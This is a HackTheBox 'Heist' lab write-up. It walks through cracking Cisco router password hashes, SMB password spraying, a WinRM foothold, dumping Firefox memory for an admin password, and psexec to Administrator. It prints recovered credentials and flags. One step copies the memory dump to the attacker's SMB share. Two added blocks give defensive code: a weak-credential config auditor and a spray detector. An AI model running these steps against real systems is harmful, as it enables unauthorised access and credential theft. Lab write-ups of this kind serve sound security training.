HackTheBox — Heist
2020-05-16 · HTB Windows
Target: 10.10.10.149
Recon
root@kali:~/htb/heist# gedit /etc/hosts
nmap -sS -sV -A -O -p- 10.10.10.149
nmap -vv 10.10.10.149
We find IIS on port 80, MSRPC on port 135, SMB on port 445 and WinRM on port 5985.
Website
Login as Guest reveals a Cisco router config attachment:
Credential Discovery
Cisco Router Config
hostname ios-1
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
Crack Type 5 (MD5) Hash
The Type 5 hash (MD5-crypt) can be cracked with online tools or with John:
echo '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' > cisco5hash
john --fork=4 -w=rockyou.txt cisco5hash
Result: stealth1agent
Crack Type 7 (Cisco Vigenère) Passwords
Type 7 passwords are reversibly encoded and decrypt instantly with online tools:
0242114B0E143F015F5D1E161713 → $uperP@ssword
02375012182C1A1D751618034F36415408 → Q4)sJu\Y8qz*A3?d
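The two cracking steps above (Type 5 and Type 7) come down to one finding: the router config stores credentials in formats that do not protect them. The following is an added example, not code from the original write-up, that audits a Cisco IOS config for weak credential storage and, for Type 7 entries, demonstrates the exposure by reversing them with Cisco's fixed, publicly documented XOR key. The sample input is the config fragment shown above; the regexes, verdict table and function names are this example's own.

```python
"""Audit a Cisco IOS config for weak credential storage.

Added example, not code from the original write-up. It classifies each
credential line by storage type and, for Type 7 entries, shows the exposure
concretely by reversing them with Cisco's fixed, publicly documented XOR key.
"""
import re

# The constant key behind Type 7 "encryption" (service password-encryption).
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

# Storage types as they appear after "password"/"secret" in IOS configs.
VERDICT = {
    "0": "plaintext",
    "5": "MD5-crypt; offline-crackable, migrate to type 8 or 9",
    "7": "reversible XOR; no real protection",
    "8": "PBKDF2-SHA256; acceptable",
    "9": "scrypt; acceptable",
}

USERNAME_RE = re.compile(
    r"^username\s+(\S+)(?:\s+privilege\s+\d+)?\s+(password|secret)\s+(\d+)\s+(\S+)"
)
ENABLE_RE = re.compile(r"^enable\s+(password|secret)\s+(\d+)\s+(\S+)")


def decode_type7(encoded: str) -> str:
    """Reverse a Type 7 string: two decimal seed digits, then hex bytes that
    were XORed with TYPE7_KEY starting at key offset `seed`."""
    if len(encoded) < 4 or len(encoded) % 2 or not encoded[:2].isdigit():
        raise ValueError(f"not a Type 7 string: {encoded!r}")
    seed = int(encoded[:2])
    body = bytes.fromhex(encoded[2:])  # raises ValueError on non-hex input
    return "".join(
        chr(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)]) for i, b in enumerate(body)
    )


def audit_config(config: str) -> list:
    """Return one finding per credential line, flagging anything weaker than
    type 8/9. Type 7 findings carry the recovered value so a report can show
    the risk concretely."""
    findings = []
    for raw in config.splitlines():
        line = raw.strip()
        m = USERNAME_RE.match(line)
        if m:
            account, keyword, ptype, value = m.groups()
        else:
            m = ENABLE_RE.match(line)
            if not m:
                continue
            account = "enable"
            keyword, ptype, value = m.groups()
        finding = {
            "account": account,
            "keyword": keyword,
            "type": ptype,
            "verdict": VERDICT.get(ptype, "unknown type"),
            "weak": ptype not in ("8", "9"),
        }
        if ptype == "7":
            finding["recovered"] = decode_type7(value)
        findings.append(finding)
    return findings


# The config fragment from the write-up, used here as sample input.
SAMPLE_CONFIG = """\
hostname ios-1
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG):
        flag = "WEAK" if f["weak"] else "ok"
        extra = f" -> recovered {f['recovered']!r}" if "recovered" in f else ""
        print(f"[{flag}] {f['account']}: {f['keyword']} type {f['type']} ({f['verdict']}){extra}")
```

The audit treats Type 5 as weak even though it is a real hash: MD5-crypt with a short salt falls to a wordlist run in seconds, as the John command above shows, so only types 8 and 9 pass. Any config that leaks (a ticketing attachment, as here, or a backup share) should be assumed to leak every Type 7 value in it.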
User Enumeration from Website
Enumerating the website surfaces users: Hazard, Support Admin, rout3r, admin
SMB Spray
# Initial spray
python3 cme smb 10.10.10.149 -u user.txt -p passwords.txt
Result: SupportDesk\Hazard:stealth1agent
RID Brute-Force for More Users
python3 cme smb 10.10.10.149 -u Hazard -p stealth1agent --rid-brute
Finds additional users: Chase, Jason
Re-spray with full user + password lists:
python3 cme smb 10.10.10.149 -u user.txt -p passwords.txt
Hit: Chase:Q4)sJu\Y8qz*A3?d
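Both cme runs above (the initial spray and the re-spray after the RID brute-force) generate the same footprint on the target: one source address failing network logons against many distinct accounts in a few seconds, followed by a success for whichever account the password fit. The following is an added example, not code from the original write-up, that implements that detection over constructed event records shaped like normalised Windows Security-log entries (4625 = failed logon, 4624 = successful logon). The source addresses are RFC 5737 documentation addresses, and the record layout, thresholds and function names are this example's own assumptions.

```python
"""Detect password spraying in Windows logon events.

Added example, not part of the original write-up. It runs over constructed
event records shaped like a SIEM's normalised Security-log entries (4625 =
failed logon, 4624 = successful logon; field names follow the Security log's
TargetUserName / IpAddress / LogonType). A spray looks like one source failing
against many distinct accounts in a short window.
"""
from collections import defaultdict
from datetime import datetime, timedelta

NETWORK_LOGON = 3  # LogonType 3 is what SMB and WinRM authentication produces

# Constructed sample: 192.0.2.10 (an RFC 5737 documentation address) sprays
# the user list from the write-up, then lands one success; 192.0.2.55 is a
# single user mistyping a password, which must not alert.
SAMPLE_EVENTS = [
    {"time": "2020-05-16T10:00:01", "id": 4625, "user": "Hazard", "ip": "192.0.2.10", "logon_type": 3},
    {"time": "2020-05-16T10:00:02", "id": 4625, "user": "Support Admin", "ip": "192.0.2.10", "logon_type": 3},
    {"time": "2020-05-16T10:00:02", "id": 4625, "user": "rout3r", "ip": "192.0.2.10", "logon_type": 3},
    {"time": "2020-05-16T10:00:03", "id": 4625, "user": "admin", "ip": "192.0.2.10", "logon_type": 3},
    {"time": "2020-05-16T10:00:04", "id": 4625, "user": "Chase", "ip": "192.0.2.10", "logon_type": 3},
    {"time": "2020-05-16T10:00:04", "id": 4625, "user": "Jason", "ip": "192.0.2.10", "logon_type": 3},
    {"time": "2020-05-16T10:00:09", "id": 4624, "user": "Chase", "ip": "192.0.2.10", "logon_type": 3},
    {"time": "2020-05-16T10:02:10", "id": 4625, "user": "Jason", "ip": "192.0.2.55", "logon_type": 3},
    {"time": "2020-05-16T10:02:15", "id": 4625, "user": "Jason", "ip": "192.0.2.55", "logon_type": 3},
    {"time": "2020-05-16T10:02:21", "id": 4625, "user": "Jason", "ip": "192.0.2.55", "logon_type": 3},
]


def detect_spray(events, window=timedelta(minutes=5), min_users=5):
    """Alert on any source IP whose failed network logons cover at least
    `min_users` distinct accounts inside some span no longer than `window`."""
    by_ip = defaultdict(list)
    for e in events:
        if e["id"] == 4625 and e["logon_type"] == NETWORK_LOGON:
            by_ip[e["ip"]].append((datetime.fromisoformat(e["time"]), e["user"].lower()))
    alerts = []
    for ip, attempts in by_ip.items():
        attempts.sort()
        start = 0
        for end, (t_end, _) in enumerate(attempts):
            # slide the window start forward until the span fits inside `window`
            while t_end - attempts[start][0] > window:
                start += 1
            users = {u for _, u in attempts[start:end + 1]}
            if len(users) >= min_users:
                alerts.append({
                    "ip": ip,
                    "distinct_users": len(users),
                    "first": attempts[start][0].isoformat(),
                    "last": t_end.isoformat(),
                })
                break  # one alert per source is enough
    return alerts


def successes_after_spray(events, alerts, grace=timedelta(minutes=30)):
    """Return (ip, user) for successful logons from an alerting source within
    `grace` of its spray: the signal that one of the sprayed passwords worked."""
    last_seen = {a["ip"]: datetime.fromisoformat(a["last"]) for a in alerts}
    hits = []
    for e in events:
        if e["id"] == 4624 and e["ip"] in last_seen:
            delta = datetime.fromisoformat(e["time"]) - last_seen[e["ip"]]
            if timedelta(0) <= delta <= grace:
                hits.append((e["ip"], e["user"]))
    return hits


if __name__ == "__main__":
    found = detect_spray(SAMPLE_EVENTS)
    for a in found:
        print(f"spray from {a['ip']}: {a['distinct_users']} accounts between {a['first']} and {a['last']}")
    for ip, user in successes_after_spray(SAMPLE_EVENTS, found):
        print(f"  success for {user} from {ip} shortly after the spray: treat as compromised")
```

Keying on distinct accounts per source rather than raw failure counts is what separates a spray from a lockout-avoiding single user, and pairing the alert with the next 4624 from the same source turns it from noise into an account to reset.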
Foothold — WinRM
python3 cme winrm 10.10.10.149 -u Chase -p 'Q4)sJu\Y8qz*A3?d'
gem install evil-winrm
ruby evil-winrm.rb -i 10.10.10.149 -u Chase -p 'Q4)sJu\Y8qz*A3?d'
User flag: a127daef77ab6d9d92008653295f59c4
Privesc — Firefox Memory Dump
Firefox is running as Administrator. Dump the process and extract credentials from memory.
get-process -name firefox
# Upload procdump via evil-winrm upload
*Evil-WinRM* PS C:\Users\Chase\Desktop> .\procdump.exe -accepteula -ma 3004 firefox.dmp
Transfer dump to Kali via impacket smbserver, then use strings to extract credentials:
# Kali
./smbserver_linux -smb2support -username guest -password guest share2 ~/htb/heist/
# Target
*Evil-WinRM* PS C:\Users\Chase\Desktop> net use x: \\10.10.14.10\share2 /user:guest guest
cmd /c copy firefox.dmp X:\
*Evil-WinRM* PS C:\Users\Chase\Desktop> ./strings.exe -a firefox.dmp | findstr login_password > what.txt
Extracted credential from Firefox memory:
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
Password: 4dD!5}x/re8]FBuZ
PSEXEC as Administrator
psexec.py 'administrator:4dD!5}x/re8]FBuZ@10.10.10.149'
Root flag: 50dfa3c6bfd20e2e0d071b073d766897